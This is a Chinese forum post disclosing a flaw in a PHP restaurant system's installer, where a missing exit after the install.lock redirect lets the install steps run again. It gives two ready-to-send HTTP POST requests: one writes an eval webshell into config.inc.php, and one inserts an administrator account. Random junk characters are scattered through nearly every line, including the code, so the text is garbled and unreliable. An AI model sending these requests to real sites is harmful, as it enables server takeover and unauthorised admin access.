问题出在/install/index.php文件。在程序安装完后,会在程序根目录下生成install.lock文件。而/install/index.php在判断是否有install.lock时出现错误。* X- Q+ b2 F( A
3 ]" R9 { H; Z8 A
<?php
; q2 z: S0 H& j# @" ^& Uif(file_exists("../install.lock"))9 d% ?, _& |9 K% O5 q% L# Z$ q- @
{
1 G+ E" b9 [& g( C0 w" X8 `! R, B$ K header("Location: ../");//没有退出
4 m! j5 t' m5 j# O [}* i! O6 ]4 J( }1 U5 _
+ L* Z! g$ ?1 H3 Q//echo 'tst';exit;
. g: l$ E# i2 A4 v r; e, frequire_once("init.php");
9 _3 y3 y1 P6 b; u8 P- R, tif(empty($_REQUEST['step']) || $_REQUEST['step']==1)) w5 P, p8 i* B' x o" u+ y* d
{
{ H# s$ h1 { \4 {可见在/install/index.php存在时,只是header做了302重定向并没有退出,也就是说下面的逻辑还是会执行的。在这里至少可以产生两个漏洞。
7 p5 ~5 z" C0 p" i) W* s5 _3 L3 t0 l: G
1、getshell(很危险)% d$ B. t( a: D3 D) B
if(empty($_REQUEST['step']) || $_REQUEST['step']==1)
: ` i+ U( e4 I2 i$ j{
9 P% L+ d/ s$ ^" |- }: `$smarty->assign("step",1);+ d4 ^# I0 O/ n o, u3 O
$smarty->display("index.html");
, ?8 c/ E! i G6 c k3 a}elseif($_REQUEST['step']==2)4 ~: C6 W4 @# f" {5 o% @
{; G4 `7 O+ R3 F7 J
$mysql_host=trim($_POST['mysql_host']);1 Y$ P- D' A2 c9 |+ r
$mysql_user=trim($_POST['mysql_user']);
4 V3 |! r% ?% k $mysql_pwd=trim($_POST['mysql_pwd']);' l X5 m5 ?* H0 Q" L3 z8 p
$mysql_db=trim($_POST['mysql_db']);" @& F" f6 i1 ^" p8 F
$tblpre=trim($_POST['tblpre']);$ e/ R! o. E5 h5 e" w, V/ \
$domain==trim($_POST['domain']);/ E2 }- G- K: n
$str="<?php \r\n";
( E- k. D* g: n6 a( ~( X f' j $str.='define("MYSQL_HOST","'.$mysql_host.'");'."\r\n";, z/ e, z1 C$ m
$str.='define("MYSQL_USER","'.$mysql_user.'");'."\r\n";
* _- t2 T6 @2 k1 m/ n $str.='define("MYSQL_PWD","'.$mysql_pwd.'");'."\r\n";
3 x0 f P/ |. [# ?! N $str.='define("MYSQL_DB","'.$mysql_db.'");'."\r\n";
# P' k" y6 M, U( K $str.='define("MYSQL_CHARSET","GBK");'."\r\n";- Y* u: `& G4 V) E) o, G3 D
$str.='define("TABLE_PRE","'.$tblpre.'");'."\r\n"; Z7 v# H2 X; M. f
$str.='define("DOMAIN","'.$domain.'");'."\r\n";9 X; W% ?: Y7 k$ \1 G5 Q7 Q* w
$str.='define("SKINS","default");'."\r\n";
2 W3 M5 g8 J4 d $str.='?>';
4 V a* N$ g$ _# M; |2 Q7 L file_put_contents("../config/config.inc.php",$str);//将提交的数据写入php文件! x. {+ V$ o4 y. y2 U
上面的代码将POST的数据直接写入了../config/config.inc.php文件,那么我们提交如下POST包,即可获得一句话木马
$ |- H5 v; P7 L; |6 m4 W. BPOST /canting/install/index.php?m=index&step=2 HTTP/1.19 p3 p$ ^ V% M5 e: e
Host: 192.168.80.1294 }( W" J; v( ~3 c* F* t
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0: B3 Q0 T3 N I, `2 l
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
7 T6 M8 P- {8 s' u) H2 d: WAccept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
9 J: ]- `0 @; W; t1 {. |Accept-Encoding: gzip, deflate8 h8 ~9 G; d, s# h! Z" c
Referer: http://192.168.80.129/canting/install/index.php?step=1
) M5 v0 E8 ]/ f" `( C4 i4 SCookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42$ Y3 f( s# c7 ]/ z0 x
Content-Type: application/x-www-form-urlencoded
9 Z8 l) j4 `4 A7 y( \Content-Length: 126+ Z% W/ K3 g& ?- D8 D
$ S F3 `. O# t3 h- dmysql_host=test");@eval($_POST[x]);?>//&mysql_user=1&mysql_pwd=2&mysql_db=3&tblpre=koufu_&domain=www&button=%CF%C2%D2%BB%B2%BD
1 e' J' t# ?' n9 ]0 T7 N. R/ h6 e但是这个方法很危险,将导致网站无法运行。
$ D& H1 O" ~) a9 \" f7 @* y# S9 N$ `, a
2、直接添加管理员7 G4 i' a4 L! b, @* j
X+ _5 B2 ~" ~" F
elseif($_REQUEST['step']==5)
6 Q1 d& E( O& k# [{
8 P: Z& e9 D) Z4 A# \2 b- L" t if($_POST)
% {7 a/ u7 I; _ { require_once("../config/config.inc.php");: j% u7 Y( _/ A/ L; P! x
$link=mysql_connect(MYSQL_HOST,MYSQL_USER,MYSQL_PWD);. V% U6 Z# `! L, Q* q6 i! e
mysql_select_db(MYSQL_DB,$link);* H! ~- w2 C. A6 L) {
mysql_query("SET NAMES ".MYSQL_CHARSET );$ P8 Z/ p9 f" ?9 Z* x* h; v/ G, L
mysql_query("SET sql_mode=''");
. ^; B8 A7 l9 w: x; z* B2 _6 N% Z1 T) y; W) _* ^$ ]
$adminname=trim($_POST['adminname']);
& S- E/ Y# @6 V' l* Z $pwd1=trim($_POST['pwd1']);
$ Y$ L0 t! `9 S# ]3 i1 ? $pwd2=trim($_POST['pwd2']);
N. I; B% T# I7 l7 _- c if(empty($adminname))
+ g$ j9 D% o4 M2 m: `# q6 K& C {! C O, y% J6 }) s1 _
4 R4 G* O( J9 F0 Z2 h0 @3 a
echo "<script>alert('管理员不能为空');history.go(-1);</script>";
; j) Q- f2 d7 K: r exit();3 `/ e8 K+ k2 l+ t6 K8 ]
}, `" J9 r0 |- S# X) G4 A
if(($pwd1!=$pwd2) or empty($pwd1))$ u9 F) o. k7 ~
{
/ f+ g3 a p5 [) l3 l0 R1 l* ] echo "<script>alert('两次输入的密码不一致');history.go(-1);</script>";//这里也是没有退出
9 P' b% k8 c7 Q8 g7 S }
" |+ d2 h1 s: C4 m8 J6 | mysql_query("insert into ".TABLE_PRE."admin(adminname,password,isfounder) values('$adminname','".umd5($pwd1)."',1)");//直接可以插入一个管理员2 s% H) s" U1 |" \& t0 R
}
% d8 U% @; [8 K/ `这样的话我们就可以直接插入一个qingshen/qingshen的管理员帐号,语句如下:
, U& z% e+ f, v7 c; IPOST /canting/install/index.php?m=index&step=5 HTTP/1.1
; Z s: X% W1 h0 fHost: 192.168.80.1294 j# H) U; M; ^2 C* q7 \
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0
* y1 ~) Y0 p. O$ HAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8- h$ C A: L+ B- }; }5 d
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
! [8 \7 I* u+ D# ~+ f7 mAccept-Encoding: gzip, deflate; P! A# u6 Q; t
Referer: http://www.2cto.com /canting/install/index.php?step=1
& `; ? v( o; eCookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42! Z- `. p% e1 H# o
Content-Type: application/x-www-form-urlencoded7 I. ^; {4 r J6 y3 k
Content-Length: 46
' w$ R. z; b8 _+ c, u% r
% \0 q }& a1 Q8 R: R9 Wadminname=qingshen&pwd1=qingshen&pwd2=qingshen) K$ u/ t j- |8 [" B- x+ s" m7 Q
|
发表于 2012-12-4 11:13:44
收藏
支持
反对